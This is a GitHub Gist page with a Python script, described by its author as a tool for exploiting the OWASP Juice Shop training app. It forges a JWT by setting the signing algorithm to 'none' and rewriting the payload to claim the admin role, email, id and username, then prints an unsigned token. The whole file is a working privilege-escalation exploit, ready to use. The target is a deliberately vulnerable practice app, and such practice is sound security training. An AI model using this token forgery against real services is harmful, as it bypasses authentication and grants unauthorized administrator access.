Created
April 16, 2021 02:01
-
-
Save sophieKaelin/c8c4c87e7c205fdbb1bfee4084dcd0b1 to your computer and use it in GitHub Desktop.
Script to generate admin token for exploiting OWASP JuiceShop Web App.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import base64, json, binascii | |
# Decode the token and extract the header if correct format | |
jwt = input("Please enter your JWT Token: ") | |
try: | |
jwtVals = jwt.split(".") | |
payload = (base64.b64decode(jwtVals[1]+'=')).decode("utf-8") | |
header = (base64.b64decode(jwtVals[0]+'=')).decode("utf-8") | |
except (IndexError, binascii.Error) as err: | |
print("\n\n*** Incorrect token format, please enter a valid JWT Token ***\n\n") | |
exit() | |
# NONE SIGNING: Convert to JSON format and update alg field | |
header = json.loads(header) | |
header['alg'] = 'none' | |
# ADMIN PRIV: Convert to JSON formate and update role, email, id and username fields | |
payload = json.loads(payload) | |
payload['data']['role'] = 'admin' | |
payload['data']['email'] = 'admin@juice-sh.op' | |
payload['data']['id'] = '1' | |
payload['data']['username'] = 'admin' | |
# Convert from JSON back to Base64 | |
header = json.dumps(header) | |
payload = json.dumps(payload) | |
header = (base64.b64encode(header.encode("utf-8"))).decode("utf-8").replace('=', '') | |
payload = (base64.b64encode(payload.encode("utf-8"))).decode("utf-8").replace('=', '') | |
# Return updated JWT (with removed signature) | |
jwt = header + '.' + payload + '.' | |
print("\nYour 'none' signed token is: \n") | |
print(jwt+'\n') |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment